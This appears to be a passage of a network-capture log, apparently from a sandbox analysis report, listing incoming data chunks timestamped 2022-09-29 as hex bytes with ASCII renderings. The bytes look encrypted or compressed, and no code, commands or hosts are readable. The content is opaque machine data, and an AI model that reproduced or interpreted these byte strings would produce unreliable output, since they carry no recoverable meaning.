                                                                                                                                                    2022-09-29 12:59:05 UTC9284INData Raw: 0e 09 26 c1 e7 8c 87 b9 a0 e6 00 7b 79 eb f0 c9 31 eb b9 02 26 26 90 31 45 94 a0 c2 16 e8 20 07 94 25 75 d8 1e fc fb e6 19 fc d4 51 f0 a6 68 bd fa b9 d5 9e da a9 ad 54 7a 39 6c 7e c3 17 9d 26 a7 46 69 a5 32 2e b8 9f c0 5d f5 5f a2 76 29 4e 85 38 c7 cf 05 62 8f 9d 76 e9 5d 2d 12 74 b2 52 ae 81 06 c9 b3 6b e9 4d e5 93 b7 3f 56 f5 2e a6 81 58 14 7a 92 b5 36 e2 63 e5 dc 0f a4 8e 07 fa d4 8d c2 27 9e 5e 50 f8 6a 2e e1 70 5e b7 98 df f4 d2 71 67 ce d0 e8 d9 9b 31 ce 63 15 49 0a 73 71 7e bc 47 a4 ee de 61 22 87 9c 9c a4 61 88 a8 f2 8a f8 09 56 1e c6 93 eb a6 21 0a cd df 5c 57 ae 8b 84 7b 04 b2 fb 22 87 ee 66 f4 13 5a 21 b3 ac c8 85 0e 84 18 a7 45 1f a3 12 d5 9e 92 5b a6 9f 2d ae 1e a3 cc 05 9a 35 72 32 a5 ba 1d 8c 72 f6 91 de 72 2a b6 95 3c 6a 8f 1d c9 cb 0c 37
                                                                                                                                                    Data Ascii: &{y1&&1E %uQhTz9l~&Fi2.]_v)N8bv]-tRkM?V.Xz6c'^Pj.p^qg1cIsq~Ga"aV!\W{"fZ!E[-5r2rr*<j7
                                                                                                                                                    2022-09-29 12:59:05 UTC9300INData Raw: 2f 84 85 a3 94 9f cd 28 3b 2f 57 d3 82 36 9e a4 a0 20 dc 94 0f cf 81 45 2c 0d b4 13 5a 2e ae a9 5d 55 03 0b f8 aa fc 9f f9 73 8a 10 95 1f 84 8c b1 0d b6 f3 c1 0e 2d da 96 c9 46 59 f3 3c c0 dd 0e b7 4e db 8f a1 98 6a b6 35 f3 eb 91 c5 ad 1a 88 c6 6d f6 c9 42 43 29 60 bc 7b 9a 00 51 ad fc d7 d0 d6 0f 7a 9c 51 2d d1 64 02 c6 a5 38 c4 0a be 5d 2a 13 ea a5 2a 6a e8 37 c2 16 67 3d 9b 4a cc d2 63 a1 ef fe 82 2c 0d fe 27 6b 87 d6 7a 39 41 58 5d c7 bf ef 1c c8 ea b1 ca 4c 35 2a a2 44 d7 40 53 94 a9 b8 19 a6 03 d5 f6 73 98 18 b0 27 d0 35 87 6f 58 bd 13 16 e9 c8 a5 88 32 0d aa d2 21 11 25 cb 33 42 15 72 ba f4 03 e1 32 d9 0c ee fe 45 ef e3 4e ec 27 bc ad cb 02 9f 2d ca 14 9c c5 d1 4d 0c ae f2 16 26 46 b5 b0 56 bc 13 ef 9c 18 df ca 39 b0 db 03 78 8c 43 72 e2 09 28 bd
                                                                                                                                                    Data Ascii: /(;/W6 E,Z.]Us-FY<Nj5mBC)`{QzQ-d8]**j7g=Jc,'kz9AX]L5*D@Ss'5oX2!%3Br2EN'-M&FV9xCr(
                                                                                                                                                    2022-09-29 12:59:05 UTC9316INData Raw: 26 6d 6d 59 5d e3 98 1c 6f 2e 85 69 b3 e2 dc 77 91 8a 49 6b db 1e 04 f4 27 3d a0 6d f2 aa c2 14 87 80 9e 7f c2 72 15 16 d6 ca 00 cd 92 b3 dd a8 cc 76 d0 03 25 64 00 e3 87 aa e1 30 f9 c3 2c 00 12 bc 4f a2 1f 34 da 01 68 5d 89 11 29 c9 41 7a a3 9b 35 c6 62 53 05 56 9b 3d 3c f1 4e eb 48 1d 1d 57 a6 3f 0e df 57 a1 04 aa 93 4c 95 fe 25 11 4b ee 3b fc c1 49 cc 44 5c a7 39 df f1 95 9b d9 87 3a 27 fd 60 73 41 00 37 d9 5c 96 bb a2 b4 8d f3 21 69 ad da 33 5d 47 30 20 29 d6 fd 40 59 e5 9a b2 36 26 fa 8a 10 95 72 c4 13 91 55 15 5a a2 fb 86 86 60 b4 db e2 78 74 0e 97 42 19 ef 32 4c a3 51 3e 1d 86 cf b0 49 99 9a 09 b2 ea 82 cc 56 68 d7 5b 1a 4f 44 81 35 c4 58 04 98 eb 85 1d 62 b3 d4 3b 7b d8 5f e7 db c2 4b 4a 5e 8f d4 ed dd 78 07 9a eb 52 e1 49 56 8d b1 5c b2 98 d0 d8
                                                                                                                                                    Data Ascii: &mmY]o.iwIk'=mrv%d0,O4h])Az5bSV=<NHW?WL%K;ID\9:'`sA7\!i3]G0 )@Y6&rUZ`xtB2LQ>IVh[OD5Xb;{_KJ^xRIV\
                                                                                                                                                    2022-09-29 12:59:05 UTC9332INData Raw: 00 e5 a8 9d e5 b8 94 c6 fe e6 bb 1c 81 72 db ff c4 7d 1f 3c 07 8b c4 80 fa 24 c6 40 fb 85 94 3d ce 61 87 59 6c 3f 56 c2 37 87 b9 63 50 62 98 b1 83 2d 63 fb 36 a2 b8 9d 50 55 70 20 08 fd 8c 7f f6 2d da 7b a3 4e c2 d0 ad ee d3 7e b6 db 13 a2 a7 fb 88 02 87 f6 14 e1 b6 41 80 c6 61 2a a3 f5 56 d8 42 ff 6e 81 24 7e b0 86 d1 a6 a6 cf db e2 45 8d c0 4a 30 61 74 d0 e7 99 46 14 1e 99 a6 1d 81 8b 78 0f 2f 6d c0 a2 10 64 6b 4f 10 5d bf df 29 44 ec 69 d7 68 17 0c 5c 80 75 ee 2b b1 9b a5 51 5f 4f 55 d6 a7 aa eb c9 28 70 73 97 3f bf 64 56 9e 2a 5e db 63 1f c5 12 5b 7c f3 a5 84 dc 2e 75 83 08 81 e2 89 b9 5b 87 87 26 27 30 2a 2c f2 8b 9d 09 06 3f d8 6e 96 03 f2 b2 55 c7 1f 54 62 17 24 5c 8b a3 e7 86 ee 09 17 3b 17 c2 8d 6e 21 e6 f6 a5 18 b1 f6 1f 7a f7 61 39 0f 58 fd bf
                                                                                                                                                    Data Ascii: r}<$@=aYl?V7cPb-c6PUp -{N~Aa*VBn$~EJ0atFx/mdkO])Dih\u+Q_OU(ps?dV*^c[|.u[&'0*,?nUTb$\;n!za9X
                                                                                                                                                    2022-09-29 12:59:05 UTC9348INData Raw: 1d c8 15 39 60 75 42 1a 41 b9 cf be 52 a1 fd f1 31 1c 08 4d bf 7b e4 22 f0 9e 37 cd a9 3b 68 dd 37 3f eb 35 e6 80 1f ff 89 f7 47 c5 37 7e 5a d2 05 77 c1 25 c8 73 41 e6 40 f9 43 af 7d 33 86 13 03 7d 7b 21 c0 2a 4d d5 8f 39 09 38 87 5a 42 2d 71 a2 cc bc 34 a1 30 24 40 13 e6 1e 07 3b 1b 40 e9 34 16 1e 92 b3 3d 95 db f0 6a 1c 73 0c ab df cf 05 3b 2e 12 49 55 de 96 d2 57 96 a6 2b f2 e3 a7 50 4f 84 22 8c e0 dd ee d9 f7 88 69 69 c9 1d e8 80 6d 28 b9 0b 6e a0 b7 35 65 24 86 9a 67 0e 14 b9 c2 ab 35 b8 7c 4c ef 63 d5 f1 7c aa c1 fa 61 ff 96 46 1f 4d 67 7d 20 5a d7 ac 59 d3 97 b0 f3 6c c0 5a b9 84 98 03 96 ea 9e 6f 8f 4d 19 62 3f 30 86 2e 3d 04 34 9c 1c 52 c0 1b a1 3d a7 e8 03 bf 84 74 d3 9b b6 bd 4c 2b e2 b8 b6 02 4c be 75 ff 2f 50 75 f5 44 28 92 c8 3c 3c be 02 91
                                                                                                                                                    Data Ascii: 9`uBAR1M{"7;h7?5G7~Zw%sA@C}3}{!*M98ZB-q40$@;@4=js;.IUW+PO"iim(n5e$g5|Lc|aFMg} ZYlZoMb?0.=4R=tL+Lu/PuD(<<
                                                                                                                                                    2022-09-29 12:59:05 UTC9364INData Raw: 9a 09 b7 ee 2f d3 1d f6 05 f7 eb e7 9d c7 a8 75 62 ac b3 2c d9 4b b3 b3 4e 88 c9 82 60 3b ab 3c d2 57 52 56 3f 59 12 c0 44 02 71 eb 68 10 28 16 37 78 df 28 69 ad c4 e0 0a 78 12 0e c8 1c ac d2 ba 32 78 25 87 7b a0 88 c8 4a 5e e1 fb 0b 97 4f c1 85 c7 17 68 b4 86 a5 db ec e3 43 8e b3 65 fc 43 24 b6 38 2d 35 38 86 25 aa 8d 32 6c d7 de 17 7f d5 06 a9 95 91 08 c6 e9 2a 3e 82 fd 7b 62 36 09 2b 16 6c 9d e5 62 9c f5 fa bd 4f a0 b7 cf d5 03 25 ae 98 77 c4 22 22 03 82 c2 93 a4 02 bc 44 62 cb 3d 93 ac 90 ed 8c cb fd a3 05 64 d7 99 10 ca 13 7f c8 f5 e1 60 69 34 96 1c 6d ae fc 5d d9 81 72 62 5e 3b 09 59 e9 46 d6 56 30 35 3f 93 40 33 90 79 a1 00 da 79 d6 6d 5f ac 62 3c 1e 9b 8c 80 5f bc 24 9c e4 f1 a0 77 97 70 2a 58 a0 6c 58 3d b2 34 0e 84 68 14 d1 fc 2b 73 18 8a 67 d3
                                                                                                                                                    Data Ascii: /ub,KN`;<WRV?YDqh(7x(ix2x%{J^OhCeC$8-58%2l*>{b6+lbO%w""Db=d`i4m]rb^;YFV05?@3yym_b<_$wp*XlX=4h+sg
                                                                                                                                                    2022-09-29 12:59:05 UTC9380INData Raw: 92 a3 97 0a 2c 9d d7 34 8e 4e 5a 21 1b fb c5 3b 8d 64 68 3d 09 ef 11 60 d6 6e a1 b1 bc da ad a5 e3 fc 61 66 66 af ce c0 70 55 46 22 ee 28 60 1f 77 4a de b4 05 42 58 0a f1 88 d2 82 20 ac 4f 1e 85 96 9e a7 a1 da 82 f4 c8 02 c0 40 4f 93 e4 8e 6b 57 30 76 bc 34 fa 5b 49 3c 80 48 a7 3d bd c2 fa 99 2f 28 7b a4 99 93 b4 6e 8b 0a 50 1e 7b dd 7a 75 96 39 e6 50 ad 8d 5b 14 ee 68 d4 75 ed fc 53 78 c6 81 af 46 7f a4 95 ec 9c 99 50 55 69 7c af 01 2b 8f 6c 43 61 e5 7d 8d 8d 84 69 52 e3 af 52 6b 99 d0 73 61 d3 94 3f ba 41 2e 6c 23 da a9 82 4b 12 78 1b b7 cb 2f 65 d0 bf 7b c8 1d 5f 2e 68 02 fe a5 48 11 55 94 92 b6 19 6f a3 3a 05 22 66 24 92 ff ad 28 dc 76 ca d7 49 a8 ce 89 a2 5a d5 1f 6e 6b a8 32 fc 4f d3 60 7e 78 3f 40 9b 33 b9 9b 38 b2 d0 8c 5f 02 fb e2 d5 6d 3e b6 b3
                                                                                                                                                    Data Ascii: ,4NZ!;dh=`naffpUF"(`wJBX O@OkW0v4[I<H=/({nP{zu9P[huSxFPUi|+lCa}iRRksa?A.l#Kx/e{_.hHUo:"f$(vIZnk2O`~x?@38_m>
                                                                                                                                                    2022-09-29 12:59:05 UTC9396INData Raw: 8e 30 12 ee fd 27 a9 d5 0c 49 8c 91 cd a7 f7 59 cd 50 19 3a c5 2f 49 13 3b 29 2d 69 61 ad 19 af bc 4c 83 4c 2c 81 7e 43 0f ee 7a 31 30 d9 0c e7 d3 de 5f 48 5f 0b 02 ba e9 ae 3a 64 39 c3 9b 20 e0 9d 4b 85 e0 d3 72 07 ba 4a e5 7b f9 a7 4f d3 af f9 27 ec e5 f8 46 a7 b4 d7 91 28 a3 4b 24 e2 6c dd 09 73 ed 0a c8 40 c8 7b 9e cd be e6 7b b1 ba 78 23 8f 9a 68 6b 2e 7c 4f e8 e9 c8 9e e3 55 17 7d ea 96 1d f3 40 65 ee 29 39 df e2 75 d6 6c f9 be 45 4e 61 36 e7 cb 8e 77 0c 9e 53 90 76 09 63 79 1b f8 d3 99 42 62 e2 49 27 c9 fc ae c5 96 5c 58 21 ed 87 aa 07 f5 3c cd cc 5f a2 88 c9 1e 45 62 f0 8b 59 20 4c d2 87 f6 d5 42 2e 8e a2 ab 1d 05 02 8d e2 d4 e1 17 49 c1 21 ce 45 ca 3c 37 ed c2 00 88 8d a6 20 2d 19 b3 0c dd 5d c4 c1 71 9e 7f 0f bc 72 c7 7c 18 96 d0 d8 1e fc ff 25
                                                                                                                                                    Data Ascii: 0'IYP:/I;)-iaLL,~Cz10_H_:d9 KrJ{O'F(K$ls@{{x#hk.|OU}@e)9ulENa6wSvcyBbI'\X!<_EbY LB.I!E<7 -]qr|%
                                                                                                                                                    2022-09-29 12:59:05 UTC9412INData Raw: 9d c7 0d f4 d4 fc e6 0e 5a 9a 13 7e e2 09 12 2c 4b 22 90 1a 2b 9f 2b 06 ae 48 30 8f 9f ad 8f 91 24 1a 9a 21 30 54 f7 56 ef 38 87 b1 84 32 fa 0b 89 51 95 be 1d 39 5d 9b 0a 78 83 83 02 e2 17 4a 14 fd bb b8 31 07 60 1d fd 94 a8 00 eb 68 5d 5a 24 64 06 55 af 46 04 0d 80 76 12 ce 97 51 c7 d3 67 43 e4 a8 ae 57 22 76 61 e3 7c bf 30 42 4c 82 08 db 25 68 b1 a2 7b 11 0d fc e3 6f f9 98 0b 57 e5 b0 c1 d0 30 cf 72 9f b7 23 05 f1 5b a9 57 c9 d6 05 d6 d1 45 e0 a2 15 6b f5 1f 1c 06 72 ed a0 01 5e aa dd 53 ee b7 4f 94 49 e7 ce a7 36 9f bc 42 55 9b 42 05 73 59 cd b2 98 02 4e 0f 03 9c 67 7c 3e 76 a0 37 a5 70 ff f9 a3 2c 54 41 06 41 20 2e 91 da c5 59 71 2a e1 5a dc f4 34 67 b4 8e 3b c3 90 4d 2e 09 dd 38 7a 78 ad 78 e4 2b 9e 5b 3e 78 2b ed bb 20 fa 7c 5f 54 d4 3c 68 95 3e 42
                                                                                                                                                    Data Ascii: Z~,K"++H0$!0TV82Q9]xJ1`h]Z$dUFvQgCW"va|0BL%h{oW0r#[WEkr^SOI6BUBsYNg|>v7p,TAA .Yq*Z4g;M.8zxx+[>x+ |_T<h>B
                                                                                                                                                    2022-09-29 12:59:05 UTC9422INData Raw: 75 7e 13 a1 99 c6 3c 44 13 36 5a 7b 97 9f be 40 23 c4 8f cb c3 41 b0 f9 d5 18 57 b9 62 e9 15 95 9e 03 fd c1 c1 6d 5b 72 ce b3 50 87 8c 43 87 ac 0b 27 56 03 9a e2 2e 96 c0 b9 c4 69 cd 1a 0d d8 9c 18 f4 2a d1 94 6a 13 a8 d4 da 71 6d 26 df 8a 80 bd 96 03 97 ca dd 02 62 1a 43 bf 49 05 f9 bf 33 9d 8b 8b 9a 94 e7 19 3e 2a c0 cb c6 63 c5 0b 2e 73 c1 63 0b 4a 8d d6 a1 c3 35 c6 b0 90 f0 3a f0 d2 07 16 f5 80 39 d3 e2 d6 fb 22 85 30 93 eb e9 12 9a 6e be c8 2a b1 31 44 86 47 bd e3 d7 b8 0c 14 fa 59 3c 7f 09 9a d1 7e 0c d1 b5 e4 ec 00 35 90 21 75 d6 e5 fa e8 bf 13 72 36 17 c9 50 9d b0 85 af 14 d2 7b 43 17 0e 14 d9 24 f5 19 e0 b2 0d 2a ce 3f 39 b3 83 8d 74 fb 8f 29 35 98 14 6e d3 ef 4e 67 60 f7 22 c0 14 14 31 f2 3b 7a 7b 3c bd 48 c7 26 bf d5 60 5e 8f ec 02 a4 6a 87 b5
                                                                                                                                                    Data Ascii: u~<D6Z{@#AWbm[rPC'V.i*jqm&bCI3>*c.scJ5:9"0n*1DGY<~5!ur6P{C$*?9t)5nNg`"1;z{<H&`^j
                                                                                                                                                    2022-09-29 12:59:05 UTC9438INData Raw: db 25 a9 19 63 16 e8 9b b4 89 b9 cb 5d 4c c6 c5 8e e2 be 30 27 f5 06 9d 13 d1 3a d5 f2 ca 6e d3 c1 ef f1 7d 42 65 a7 58 f7 11 9e e9 67 65 0d 8b 18 bf 8d 18 94 ca ac 43 72 2c 89 34 ec 95 9e ce 32 37 b7 4e 7a 6d ff 59 a7 df bf 18 5a 7a ba 7d 9e 69 e1 cb 9f 7a 5c a9 29 42 29 fd 1b 4c bc 77 64 27 d9 00 83 0c 5c 0b 5f ca a7 8d 47 08 46 cf 24 94 4a 0a 9a 04 4e 45 59 b6 27 a3 05 ad e6 40 93 bd 29 98 9f 14 f6 c7 5d 16 de f4 70 fb 89 15 39 db c0 cf 55 3c 05 45 2e b3 54 c7 d2 ba 02 fa 3a e5 e4 e8 8d c2 17 de a3 60 3f 14 31 61 c2 cf 9a cb 62 cd de a5 df 92 3f f0 3b 26 c4 4c 9d a2 7c dd d6 2a 8c cc 0e 99 b0 4f ee f6 58 86 3e bb 25 09 d7 a1 3b 2f 7c e3 30 29 67 72 e2 68 b0 e6 67 c5 5a 1a ee 65 2f 01 35 f2 b3 40 30 5e e8 ea 25 b1 7c aa 62 68 06 d1 4c f9 05 0d 99 d4 2b
                                                                                                                                                    Data Ascii: %c]L0':n}BeXgeCr,427NzmYZz}iz\)B)Lwd'\_GF$JNEY'@)]p9U<E.T:`?1ab?;&L|*OX>%;/|0)grhgZe/5@0^%|bhL+
                                                                                                                                                    2022-09-29 12:59:05 UTC9454INData Raw: d7 4b b0 48 41 c7 94 47 e7 ee 59 79 a7 fe 32 de f6 a2 ab a7 0a 4c 46 b4 2a e5 d7 05 d6 33 35 e7 48 27 67 7d c9 70 27 13 9a 51 23 01 4a 98 21 d5 62 a8 c8 03 ad 52 bf a3 73 3e a0 5f 7e ac 34 fc 30 54 7f b9 b0 5f 52 f0 ab 31 9e bd 79 4d 68 ce 96 2c 27 ab a2 02 23 19 dc 1d 4c 73 e8 ce 55 0c 14 7e 53 be ef 97 be fa e3 60 95 ef 43 20 ab e7 50 ea b0 a8 e5 86 3f 57 7d c8 fd ce 08 30 f7 6a bf cf 0c 03 c2 f2 c3 37 19 8b 9f 32 79 dd a9 b1 f1 23 d0 c6 e3 e9 5a 76 f0 c2 f1 9d 1c 68 ad 23 09 28 25 21 f2 9b 5f 7b 3a e1 bf 84 d1 45 69 f0 35 1f 49 2d 64 72 08 9b 33 e8 fd df ec 28 e5 73 e2 04 f9 f2 1d 40 9f a2 23 d1 aa 5b 32 a5 03 f8 79 b4 01 7e 3e ef 10 a1 81 7d 6e 7d 1b 50 77 14 88 83 d8 6f 61 36 a0 3a 2f fe c3 2c 17 16 0b a1 72 f7 1a 3b 48 ae 4f 75 a9 fa de 3c 9f 2a 8e
                                                                                                                                                    Data Ascii: KHAGYy2LF*35H'g}p'Q#J!bRs>_~40T_R1yMh,'#LsU~S`C P?W}0j72y#Zvh#(%!_{:Ei5I-dr3(s@#[2y~>}n}Pwoa6:/,r;HOu<*
                                                                                                                                                    2022-09-29 12:59:05 UTC9470INData Raw: 53 d5 71 50 7f e3 38 7a b8 b6 3e de c0 96 0a bb dd 7d f1 1e 9b be 30 c9 ab e5 1d 9d 9c 2d 82 dc 3f e2 86 b9 50 b3 49 4e aa b1 35 70 ba ce ec 61 1c 85 69 d5 96 17 a6 90 9d 20 8d 67 07 c0 59 20 48 14 fe b9 03 fa 42 aa 68 6e 1d 91 70 b4 08 25 42 a7 73 2b cf 85 70 02 90 fc a6 91 41 c7 8c d9 16 e5 3f 61 f1 ff 37 dc 4c 8c dc be ae 21 7c 8a f8 ca 7b 97 7a 9b cc a9 42 ae cd c8 d3 85 7b 4c 1d 46 f2 70 64 62 27 3a 19 a1 d4 80 67 78 82 65 f5 e2 0e bb 88 f6 7b f3 20 4b 79 0e ac 24 4c 89 ab 1d 33 11 a9 1e 58 14 dd 21 68 57 12 c8 82 4a 2a ca 97 8d a1 b8 b6 97 60 cf 4a 71 e5 20 88 19 29 e5 89 88 ed d5 5e c9 c6 74 e6 21 f3 47 eb 86 93 54 7f 62 4e 80 64 54 01 f2 ce 5f 25 34 5e 10 96 e4 34 bb e0 b2 d3 8f b7 e0 5c 94 a7 26 12 e3 c8 6a ed f0 a7 b4 cc b4 01 0d 0a 77 47 c2 72
                                                                                                                                                    Data Ascii: SqP8z>}0-?PIN5pai gY HBhnp%Bs+pA?a7L!|{zB{LFpdb':gxe{ Ky$L3X!hWJ*`Jq )^t!GTbNdT_%4^4\&jwGr
                                                                                                                                                    2022-09-29 12:59:05 UTC9486INData Raw: bf 41 c8 f7 72 1c db 4e 37 2e b6 d2 4c 84 5b ae 57 fd 72 87 19 86 b2 7f 6b fc 24 28 bb b0 7c 83 c7 16 14 da 05 97 2c f7 ee 38 b4 19 08 9f 92 30 46 1f 09 77 2e 38 35 2c f5 46 be 35 e3 ff f3 de be fc 63 43 50 7d a3 e0 a3 e3 cf 23 e5 13 eb 3e 17 21 d3 d4 31 0c d4 80 f1 5f c8 66 47 f0 a8 14 f2 00 fe 26 e7 07 20 fc 0b 4b 34 f4 1e a2 00 28 4f b7 54 d3 2c 3d 82 6b 78 4d 07 7f a4 1a ab bf 85 57 5e cd d2 bc 56 bf d5 9c c3 0f 79 cb ea 12 42 ec 9d 46 1c 74 35 09 49 fa a0 d2 1d d4 62 b0 65 10 85 16 6d 30 2e c4 17 90 6a 0f 8b cb af 01 bb 79 db 84 fa d6 ed 66 b4 06 11 cb 33 77 3c 05 38 45 eb 2e 95 e9 e3 52 fa 0c 76 78 d6 07 f9 39 eb 92 08 23 80 07 93 99 02 fa 51 ff cb 98 45 92 8f 43 1d 13 79 78 68 c6 e6 d0 1b 5b 81 d8 cd 26 ab fd 35 b4 ab 1c 2e 80 df 1f ee a0 9e 42 5c
                                                                                                                                                    Data Ascii: ArN7.L[Wrk$(|,80Fw.85,F5cCP}#>!1_fG& K4(OT,=kxMW^VyBFt5Ibem0.jyf3w<8E.Rvx9#QECyxh[&5.B\
                                                                                                                                                    2022-09-29 12:59:05 UTC9502INData Raw: e3 2e ab c8 9e ea 99 0c a2 b6 cf d6 23 da 4a 06 83 c9 60 51 35 1d 7b a1 2e 99 9f a5 e5 db db 2a d2 e2 51 ee b4 ba 43 89 70 0a 59 26 1b 25 e4 f9 b8 f3 53 0d 8c 4c 94 12 63 90 d7 5e 0a 3b 56 ad b5 bf dc 00 db 6a b7 33 8f 7a c8 ca 4b 4c 1b 8e cd e4 13 da 7b bd 21 e5 c1 4e a7 57 da ee 85 e7 0a 29 b9 d5 cf 13 1f f7 84 aa 31 bb d1 69 e2 0e e9 ff 0d 12 58 01 1b ef 49 83 a3 bd 16 d5 b6 42 f8 0e aa e6 ba 0a d9 be e7 ad 0c 9d 5e 70 07 9a 16 15 b7 a1 38 9d 93 9e af 55 fd 90 3a e7 0c 42 20 b6 55 7e cc fd 1c d5 78 ca 37 eb 9b 10 17 9b a7 a3 94 2a 01 d3 41 1f 0d 05 6b 7f aa 61 b6 cc ae 71 1b be 9c 67 00 83 4d 46 6a eb ff dd 7d 9d 68 0c 8b 64 71 f3 46 11 45 45 b9 97 f7 1f 88 a9 20 a4 30 e8 f8 68 4c fb 40 e1 5f ca 64 4d 40 ec 11 cd 97 59 1f 6f 12 84 6b ae 50 9d 36 95 4a
                                                                                                                                                    Data Ascii: .#J`Q5{.*QCpY&%SLc^;Vj3zKL{!NW)1iXIB^p8U:B U~x7*AkaqgMFj}hdqFEE 0hL@_dM@YokP6J
                                                                                                                                                    2022-09-29 12:59:05 UTC9518INData Raw: 5e 09 12 28 5a 40 fb 9b 69 cd cd 41 c7 d9 6f 1d 06 af 64 4b 58 00 07 11 ad ea 25 ac 0f 48 d7 42 d8 bf 5a ec 62 b9 a6 53 cb 65 f8 0f ca 9d 39 ce 87 f6 7c 68 f5 0d fa 92 13 45 e1 0a 81 fb af da 3f c3 1c 98 08 16 fc 76 95 de 1d a4 d4 54 6f 2a 28 d3 7f 4d f6 2b 57 1d c1 a8 f7 6e e5 30 44 15 ae e0 c9 ed 88 0a 6d e0 d4 ab 84 c7 71 92 23 b0 03 bf a5 f0 79 76 1e ad d4 41 9f 9b 05 9c 4d c6 c6 57 21 9f 59 cb c0 89 61 66 02 0a 02 01 99 34 ab 34 32 f4 31 93 66 28 7a 62 e3 ba 73 04 19 14 a5 41 0b b0 9f b2 d4 ec d9 95 46 80 04 2e 5f 3a 32 b4 76 33 c4 5d d6 51 fb b1 a3 7b e9 43 de b6 24 56 e3 ec a6 de 96 17 93 b9 60 70 c0 10 65 08 8a 52 60 ea bc 75 30 c5 08 ab bc d4 d6 3c a2 1c bc 38 45 93 d7 89 b0 7a 88 6f 1d 3e 5d e8 7c e6 60 d6 e5 df 1f 31 b2 ff fc 24 ac 96 84 9f 4b
                                                                                                                                                    Data Ascii: ^(Z@iAodKX%HBZbSe9|hE?vTo*(M+Wn0Dmq#yvAMW!Yaf4421f(zbsAF._:2v3]Q{C$V`peR`u0<8Ezo>]|`1$K
                                                                                                                                                    2022-09-29 12:59:05 UTC9534INData Raw: 03 c7 f2 34 47 8c df 21 c2 35 4e f0 ae 34 d0 cd f7 0b bf af d8 ae c7 60 f1 c2 8a 20 e2 c2 6c b0 fb 03 83 43 11 78 0b 11 64 93 11 2f 1e b9 ce 18 87 79 9f 2f fb a9 30 36 80 35 33 e8 4f ba a8 c8 53 52 21 ec 91 9a 8b 46 6f 17 bf b4 0a 98 5b 0a be 7a 15 d0 99 f6 9b 6a 98 55 68 05 04 4a 6e 29 02 e8 55 c0 8d c5 26 ad 63 d0 92 3a 18 18 bd e7 bd d5 dd 70 1d 94 ea 93 5f 7b d6 d1 2f a3 f5 57 ab 54 2f f1 af 89 d1 13 f4 c2 56 7e e1 89 a0 04 fb a4 4e 80 b8 5c e0 92 73 5d 0c 38 e6 91 c4 cc 1d aa 70 06 ca 8b 1a 53 42 90 0d 11 8c 44 a7 17 f2 a9 1d 28 d4 f7 98 53 5c c5 5d d2 d1 0b 20 e3 81 86 7d 68 b0 67 95 22 0b b7 e7 72 94 c6 83 2a eb 11 6a b7 bb 7f 16 c5 35 89 33 62 7d b5 01 e9 6c 00 8e 34 47 69 35 01 36 68 c6 01 09 57 16 e8 0e ac 9c c6 0d 9f 73 34 16 f6 39 73 55 5b 08
                                                                                                                                                    Data Ascii: 4G!5N4` lCxd/y/0653OSR!Fo[zjUhJn)U&c:p_{/WT/V~N\s]8pSBD(S\] }hg"r*j53b}l4Gi56hWs49sU[
                                                                                                                                                    2022-09-29 12:59:05 UTC9550INData Raw: c8 dd 77 a6 f5 89 19 56 fe d1 0e 8c 36 9e 8e 9f 2a 4f fc d7 e0 7e fd 9c 15 54 07 9f 09 7a ce 08 83 0a 31 44 b2 7c be ad fe 1e 14 74 2d b7 12 77 7a 03 ea 9d 4d a7 be de 7b 8b f1 4e ed d6 63 21 dc 74 8c 3b 06 97 53 61 26 b8 ae 37 5c eb f1 ac a9 62 61 6d 9d d4 e5 f7 5c ce 6e 49 c7 50 10 3d b2 f1 a2 c8 02 fd 0e e2 63 0c 54 c6 ea 56 f3 a3 4e 01 d5 f8 ca 09 28 d6 3f a0 ac 67 42 ce 11 53 7b 22 98 ba 68 2a ee 56 83 86 b2 0b 39 f2 69 db c9 77 8a 8c f2 f9 43 b3 98 c0 a9 23 12 d1 23 2b 0a a6 33 a0 89 bc e0 5f e1 04 61 dc 74 c2 e8 2e 02 3e 12 2d 93 98 05 ed c0 fc f0 ef 6e 72 b8 79 a7 d2 cd db 67 87 32 02 69 13 97 a1 f7 43 17 82 41 d8 5b d9 49 85 1a c2 1e 25 b2 21 d4 3a 0a f9 32 b6 f9 7f 22 ef b4 56 f6 08 20 47 df c2 a4 d6 e3 c9 26 11 1d ca 4e 98 1e c3 ec e2 33 cf 8e
                                                                                                                                                    Data Ascii: wV6*O~Tz1D|t-wzM{Nc!t;Sa&7\bam\nIP=cTVN(?gBS{"h*V9iwC##+3_at.>-nryg2iCA[I%!:2"V G&N3
                                                                                                                                                    2022-09-29 12:59:05 UTC9566INData Raw: a0 ff a9 69 48 86 d4 43 08 09 54 91 f3 1a 62 c4 11 a1 fe 0a 91 b8 69 23 85 1c 56 13 d2 ec 5c 2d a8 aa 2e 40 eb 55 bd 3c 42 1b f1 e9 d3 f2 d9 7e 45 ab 3e 79 f5 57 fc 8d e6 df ff a1 ee 26 e6 24 4f aa 75 9e d3 c9 d7 4a 7a 97 67 00 f7 40 8e a1 69 5c ba 65 db 0f 26 63 87 21 f6 eb 8d d0 e7 33 08 b3 b2 c4 bd 40 0a 77 34 1c cf 66 2d c5 43 c7 fd 02 e1 3a 08 38 a8 c8 e7 9d a4 82 ac d1 b3 54 d2 6f fb dd 84 be 72 ec 10 d1 3c df 94 b2 85 0f 58 52 24 7a 95 ed c4 2e 5c 05 f7 09 9c 9f b3 79 48 dc 3f 0d 4c 00 8a fa 88 30 f5 61 29 e2 ea aa 04 b9 79 ab c8 d6 00 13 a7 00 ec c9 72 33 fb 25 e6 72 91 1a ae 8e 49 25 fc 4f 74 5e a7 b3 b3 46 22 d9 a1 32 6a 0b 01 ef 1a c0 06 de aa 69 c0 97 0f b5 55 a4 5f c2 e0 84 53 9b 88 03 69 43 1d 7f 22 12 31 6c 60 88 78 1d 15 09 d9 51 74 cc 4f
                                                                                                                                                    Data Ascii: iHCTbi#V\-.@U<B~E>yW&$OuJzg@i\e&c!3@w4f-C:8Tor<XR$z.\yH?L0a)yr3%rI%Ot^F"2jiU_SiC"1l`xQtO
